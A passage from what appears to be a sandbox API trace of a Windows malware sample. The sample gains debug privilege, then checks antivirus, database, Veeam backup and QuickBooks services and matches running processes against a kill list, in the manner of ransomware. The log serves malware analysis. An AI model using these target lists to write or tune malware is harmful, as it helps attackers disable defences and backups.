Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x10, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0062.812] wvsprintfA (in: param_1=0x205ee10, param_2="Debug Privilege: OK", arglist=0x205f350 | out: param_1="Debug Privilege: OK") returned 19 [0062.812] wsprintfA (in: param_1=0x205ee10, param_2="%s\r\n" | out: param_1="Debug Privilege: OK\r\n") returned 21 [0062.812] GetLocalTime (in: lpSystemTime=0x205f310 | out: lpSystemTime=0x205f310*(wYear=0x7e6, wMonth=0x6, wDayOfWeek=0x4, wDay=0x1e, wHour=0xe, wMinute=0x1c, wSecond=0x12, wMilliseconds=0xe0)) [0062.812] wsprintfA (in: param_1=0x205f210, param_2="[%.2u:%.2u:%.2u] " | out: param_1="[14:28:18] ") returned 11 [0062.812] GetStdHandle (nStdHandle=0xfffffff5) returned 0x0 [0062.812] SetConsoleTextAttribute (hConsoleOutput=0x0, wAttributes=0xa) returned 0 [0062.812] WriteConsoleA (in: hConsoleOutput=0x0, lpBuffer=0x205f210, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x205f33c, lpReserved=0x0 | out: lpNumberOfCharsWritten=0x205f33c*=0x13) returned 0 [0062.812] SetConsoleTextAttribute (hConsoleOutput=0x0, wAttributes=0xf) returned 0 [0062.812] WriteConsoleA (in: hConsoleOutput=0x0, lpBuffer=0x205ee10, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x205f33c, lpReserved=0x0 | out: lpNumberOfCharsWritten=0x205f33c*=0x13) returned 0 [0062.812] CloseHandle (hObject=0x148) returned 1 [0062.812] OpenSCManagerA (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x2bfed0 [0062.813] GetTickCount () returned 0x1dbc606 [0062.813] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="wrapper", dwDesiredAccess=0x2c) returned 0x0 [0062.814] GetTickCount () returned 0x1dbc606 [0062.814] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="DefWatch", dwDesiredAccess=0x2c) returned 0x0 [0062.815] GetTickCount () returned 0x1dbc606 [0062.815] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="ccEvtMgr", dwDesiredAccess=0x2c) returned 0x0 [0062.815] GetTickCount () returned 0x1dbc606 [0062.815] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="ccSetMgr", dwDesiredAccess=0x2c) returned 0x0 [0062.815] GetTickCount () returned 0x1dbc606 [0062.815] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="SavRoam", dwDesiredAccess=0x2c) returned 0x0 [0062.815] GetTickCount () returned 0x1dbc606 [0062.815] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="Sqlservr", dwDesiredAccess=0x2c) returned 0x0 [0062.816] GetTickCount () returned 0x1dbc606 [0062.816] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="sqlagent", dwDesiredAccess=0x2c) returned 0x0 [0062.816] GetTickCount () returned 0x1dbc606 [0062.816] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="sqladhlp", dwDesiredAccess=0x2c) returned 0x0 [0062.817] GetTickCount () returned 0x1dbc606 [0062.817] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="Culserver", dwDesiredAccess=0x2c) returned 0x0 [0062.818] GetTickCount () returned 0x1dbc606 [0062.818] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="RTVscan", dwDesiredAccess=0x2c) returned 0x0 [0062.818] GetTickCount () returned 0x1dbc606 [0062.818] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="sqlbrowser", dwDesiredAccess=0x2c) returned 0x0 [0062.818] GetTickCount () returned 0x1dbc606 [0062.818] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="SQLADHLP", dwDesiredAccess=0x2c) returned 0x0 [0062.818] GetTickCount () returned 0x1dbc606 [0062.818] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="QBIDPService", dwDesiredAccess=0x2c) returned 0x0 [0062.819] GetTickCount () returned 0x1dbc606 [0062.819] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="Intuit.QuickBooks.FCS", dwDesiredAccess=0x2c) returned 0x0 [0062.819] GetTickCount () returned 0x1dbc606 [0062.819] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="QBCFMonitorService", dwDesiredAccess=0x2c) returned 0x0 [0062.819] GetTickCount () returned 0x1dbc606 [0062.819] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="sqlwriter", dwDesiredAccess=0x2c) returned 0x0 [0062.820] GetTickCount () returned 0x1dbc606 [0062.820] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="msmdsrv", dwDesiredAccess=0x2c) returned 0x0 [0062.820] GetTickCount () returned 0x1dbc606 [0062.820] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="tomcat6", dwDesiredAccess=0x2c) returned 0x0 [0062.820] GetTickCount () returned 0x1dbc615 [0062.821] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="zhudongfangyu", dwDesiredAccess=0x2c) returned 0x0 [0062.821] GetTickCount () returned 0x1dbc615 [0062.821] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="vmware-usbarbitator64", dwDesiredAccess=0x2c) returned 0x0 [0062.821] GetTickCount () returned 0x1dbc615 [0062.821] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="vmware-converter", dwDesiredAccess=0x2c) returned 0x0 [0062.821] GetTickCount () returned 0x1dbc615 [0062.821] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="dbsrv12", dwDesiredAccess=0x2c) returned 0x0 [0062.822] GetTickCount () returned 0x1dbc615 [0062.822] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="dbeng8", dwDesiredAccess=0x2c) returned 0x0 [0062.822] GetTickCount () returned 0x1dbc615 [0062.822] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQL$MICROSOFT##WID", dwDesiredAccess=0x2c) returned 0x0 [0062.822] GetTickCount () returned 0x1dbc615 [0062.822] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQL$VEEAMSQL2012", dwDesiredAccess=0x2c) returned 0x0 [0062.822] GetTickCount () returned 0x1dbc615 [0062.822] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="SQLAgent$VEEAMSQL2012", dwDesiredAccess=0x2c) returned 0x0 [0062.823] GetTickCount () returned 0x1dbc615 [0062.823] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="SQLBrowser", dwDesiredAccess=0x2c) returned 0x0 [0062.823] GetTickCount () returned 0x1dbc615 [0062.823] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="SQLWriter", dwDesiredAccess=0x2c) returned 0x0 [0062.823] GetTickCount () returned 0x1dbc615 [0062.823] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="FishbowlMySQL", dwDesiredAccess=0x2c) returned 0x0 [0062.824] GetTickCount () returned 0x1dbc615 [0062.824] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQL$MICROSOFT##WID", dwDesiredAccess=0x2c) returned 0x0 [0062.824] GetTickCount () returned 0x1dbc615 [0062.824] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MySQL57", dwDesiredAccess=0x2c) returned 0x0 [0062.824] GetTickCount () returned 0x1dbc615 [0062.824] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQL$KAV_CS_ADMIN_KIT", dwDesiredAccess=0x2c) returned 0x0 [0062.824] GetTickCount () returned 0x1dbc615 [0062.824] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQLServerADHelper100", dwDesiredAccess=0x2c) returned 0x0 [0062.825] GetTickCount () returned 0x1dbc615 [0062.825] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="SQLAgent$KAV_CS_ADMIN_KIT", dwDesiredAccess=0x2c) returned 0x0 [0062.825] GetTickCount () returned 0x1dbc615 [0062.825] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="msftesql-Exchange", dwDesiredAccess=0x2c) returned 0x0 [0062.825] GetTickCount () returned 0x1dbc615 [0062.825] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQL$MICROSOFT##SSEE", dwDesiredAccess=0x2c) returned 0x0 [0062.825] GetTickCount () returned 0x1dbc615 [0062.825] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQL$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0062.826] GetTickCount () returned 0x1dbc615 [0062.826] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQL$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0062.826] GetTickCount () returned 0x1dbc615 [0062.826] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQLFDLauncher$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0062.826] GetTickCount () returned 0x1dbc615 [0062.826] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="MSSQLFDLauncher$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0062.826] GetTickCount () returned 0x1dbc615 [0062.827] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="SQLAgent$SBSMONITORING", dwDesiredAccess=0x2c) returned 0x0 [0062.827] GetTickCount () returned 0x1dbc615 [0062.827] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="SQLAgent$SHAREPOINT", dwDesiredAccess=0x2c) returned 0x0 [0062.827] GetTickCount () returned 0x1dbc615 [0062.827] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="QBFCService", dwDesiredAccess=0x2c) returned 0x0 [0062.827] GetTickCount () returned 0x1dbc615 [0062.827] OpenServiceA (hSCManager=0x2bfed0, lpServiceName="QBVSS", dwDesiredAccess=0x2c) returned 0x0 [0062.828] CloseServiceHandle (hSCObject=0x2bfed0) returned 1 [0062.828] CoInitializeEx (pvReserved=0x0, dwCoInit=0x6) returned 0x0 [0063.631] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x170 [0063.648] Process32First (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0063.649] PathRemoveExtensionA (in: pszPath="[System Process]" | out: pszPath="[System Process]") [0063.649] lstrcmpiA (lpString1="[System Process]", lpString2="wxServer") returned -1 [0063.653] lstrcmpiA (lpString1="[System Process]", lpString2="wxServerView") returned -1 [0063.653] lstrcmpiA (lpString1="[System Process]", lpString2="Sqlservr") returned -1 [0063.653] lstrcmpiA (lpString1="[System Process]", lpString2="RAgui") returned -1 [0063.653] lstrcmpiA (lpString1="[System Process]", lpString2="supervise") returned -1 [0063.653] lstrcmpiA (lpString1="[System Process]", lpString2="Culture") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="RTVscan") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="Defwatch") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="sqlbrowser") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="winword") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="QBW32") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="QBDBMgr") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="qbupdate") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="QBCFMonitorService") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="axlbridge") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="QBIDPService") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="httpd") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="fdlauncher") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="MsDtSrvr") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="tomcat6") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="java") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="360se") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="360doctor") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="wdswfsafe") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="fdhost") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="GDscan") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="ZhuDongFangYu") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="QBDBMgrN") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="sqlwriter") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="mysqld") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="AutodeskDesktopApp") returned -1 [0063.654] lstrcmpiA (lpString1="[System Process]", lpString2="acwebbrowser") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="Creative Cloud") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="Adobe Desktop Service") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="CoreSync") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="Adobe CEF Helper") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="node") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="AdobeIPCBroker") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="sync-taskbar") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="sync-worker") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="InputPersonalization") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="AdobeCollabSync") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="BrCtrlCntr") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="BrCcUxSys") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="SimplyConnectionManager") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="Simply.SystemTrayIcon") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="fbguard") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="fbserver") returned -1 [0063.655] lstrcmpiA (lpString1="[System Process]", lpString2="ONENOTEM") returned -1 [0063.655] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0063.656] PathRemoveExtensionA (in: pszPath="System" | out: pszPath="System") [0063.656] lstrcmpiA (lpString1="System", lpString2="wxServer") returned -1 [0063.656] lstrcmpiA (lpString1="System", lpString2="wxServerView") returned -1 [0063.656] lstrcmpiA (lpString1="System", lpString2="Sqlservr") returned 1 [0063.656] lstrcmpiA (lpString1="System", lpString2="RAgui") returned 1 [0063.656] lstrcmpiA (lpString1="System", lpString2="supervise") returned 1 [0063.656] lstrcmpiA (lpString1="System", lpString2="Culture") returned 1 [0063.656] lstrcmpiA (lpString1="System", lpString2="RTVscan") returned 1 [0063.656] lstrcmpiA (lpString1="System", lpString2="Defwatch") returned 1 [0063.656] lstrcmpiA (lpString1="System", lpString2="sqlbrowser") returned 1 [0063.656] lstrcmpiA (lpString1="System", lpString2="winword") returned -1 [0063.656] lstrcmpiA (lpString1="System", lpString2="QBW32") returned 1 [0063.656] lstrcmpiA (lpString1="System", lpString2="QBDBMgr") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="qbupdate") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="QBCFMonitorService") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="axlbridge") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="QBIDPService") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="httpd") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="fdlauncher") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="MsDtSrvr") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="tomcat6") returned -1 [0063.657] lstrcmpiA (lpString1="System", lpString2="java") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="360se") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="360doctor") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="wdswfsafe") returned -1 [0063.657] lstrcmpiA (lpString1="System", lpString2="fdhost") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="GDscan") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="ZhuDongFangYu") returned -1 [0063.657] lstrcmpiA (lpString1="System", lpString2="QBDBMgrN") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="sqlwriter") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="mysqld") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="AutodeskDesktopApp") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="acwebbrowser") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="Creative Cloud") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="Adobe Desktop Service") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="CoreSync") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="Adobe CEF Helper") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="node") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="AdobeIPCBroker") returned 1 [0063.657] lstrcmpiA (lpString1="System", lpString2="sync-taskbar") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="sync-worker") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="InputPersonalization") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="AdobeCollabSync") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="BrCtrlCntr") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="BrCcUxSys") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="SimplyConnectionManager") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="Simply.SystemTrayIcon") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="fbguard") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="fbserver") returned 1 [0063.658] lstrcmpiA (lpString1="System", lpString2="ONENOTEM") returned 1 [0063.658] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0063.659] PathRemoveExtensionA (in: pszPath="smss.exe" | out: pszPath="smss") [0063.659] lstrcmpiA (lpString1="smss", lpString2="wxServer") returned -1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="wxServerView") returned -1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="Sqlservr") returned -1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="RAgui") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="supervise") returned -1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="Culture") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="RTVscan") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="Defwatch") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="sqlbrowser") returned -1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="winword") returned -1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="QBW32") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="QBDBMgr") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="qbupdate") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="QBCFMonitorService") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="axlbridge") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="QBIDPService") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="httpd") returned 1 [0063.659] lstrcmpiA (lpString1="smss", lpString2="fdlauncher") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="MsDtSrvr") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="tomcat6") returned -1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="java") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="360se") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="360doctor") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="wdswfsafe") returned -1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="fdhost") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="GDscan") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="ZhuDongFangYu") returned -1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="QBDBMgrN") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="sqlwriter") returned -1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="mysqld") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="AutodeskDesktopApp") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="acwebbrowser") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="Creative Cloud") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="Adobe Desktop Service") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="CoreSync") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="Adobe CEF Helper") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="node") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="AdobeIPCBroker") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="sync-taskbar") returned -1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="sync-worker") returned -1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="InputPersonalization") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="AdobeCollabSync") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="BrCtrlCntr") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="BrCcUxSys") returned 1 [0063.660] lstrcmpiA (lpString1="smss", lpString2="SimplyConnectionManager") returned 1 [0063.661] lstrcmpiA (lpString1="smss", lpString2="Simply.SystemTrayIcon") returned 1 [0063.661] lstrcmpiA (lpString1="smss", lpString2="fbguard") returned 1 [0063.661] lstrcmpiA (lpString1="smss", lpString2="fbserver") returned 1 [0063.661] lstrcmpiA (lpString1="smss", lpString2="ONENOTEM") returned 1 [0063.661] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0063.662] PathRemoveExtensionA (in: pszPath="csrss.exe" | out: pszPath="csrss") [0063.662] lstrcmpiA (lpString1="csrss", lpString2="wxServer") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="wxServerView") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="Sqlservr") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="RAgui") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="supervise") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="Culture") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="RTVscan") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="Defwatch") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="sqlbrowser") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="winword") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="QBW32") returned -1 [0063.662] lstrcmpiA (lpString1="csrss", lpString2="QBDBMgr") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="qbupdate") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="QBCFMonitorService") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="axlbridge") returned 1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="QBIDPService") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="httpd") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="fdlauncher") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="MsDtSrvr") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="tomcat6") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="java") returned -1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="360se") returned 1 [0063.754] lstrcmpiA (lpString1="csrss", lpString2="360doctor") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="wdswfsafe") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="fdhost") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="GDscan") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="ZhuDongFangYu") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="QBDBMgrN") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="sqlwriter") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="mysqld") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="AutodeskDesktopApp") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="acwebbrowser") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="Creative Cloud") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="Adobe Desktop Service") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="CoreSync") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="Adobe CEF Helper") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="node") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="AdobeIPCBroker") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="sync-taskbar") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="sync-worker") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="InputPersonalization") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="AdobeCollabSync") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="BrCtrlCntr") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="BrCcUxSys") returned 1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="SimplyConnectionManager") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="Simply.SystemTrayIcon") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="fbguard") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="fbserver") returned -1 [0063.755] lstrcmpiA (lpString1="csrss", lpString2="ONENOTEM") returned -1 [0063.756] Process32Next (in: hSnapshot=0x170, lppe=0x205fd50 | out: lppe=0x205fd50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0063.757] PathRemoveExtensionA (in: pszPath="wininit.exe" | out: pszPath="wininit") [0063.757] lstrcmpiA (lpString1="wininit", lpString2="wxServer") returned -1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="wxServerView") returned -1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="Sqlservr") returned 1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="RAgui") returned 1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="supervise") returned 1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="Culture") returned 1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="RTVscan") returned 1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="Defwatch") returned 1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="sqlbrowser") returned 1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="winword") returned -1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="QBW32") returned 1 [0063.757] lstrcmpiA (lpString1="wininit", lpString2="QBDBMgr") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="qbupdate") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="QBCFMonitorService") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="axlbridge") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="QBIDPService") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="httpd") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="fdlauncher") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="MsDtSrvr") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="tomcat6") returned 1 [0063.758] lstrcmpiA (lpString1="wininit", lpString2="java") returned 1 [0063.758] 